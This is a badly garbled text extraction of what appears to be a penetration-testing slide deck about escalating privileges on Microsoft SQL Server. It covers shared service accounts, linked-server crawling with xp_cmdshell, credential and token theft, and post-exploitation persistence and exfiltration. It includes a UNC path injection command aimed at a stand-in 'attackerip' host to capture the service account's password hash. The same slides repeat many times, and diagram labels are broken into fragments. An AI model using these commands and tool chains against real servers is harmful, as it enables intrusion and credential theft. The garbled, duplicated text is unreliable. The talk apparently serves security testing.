DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
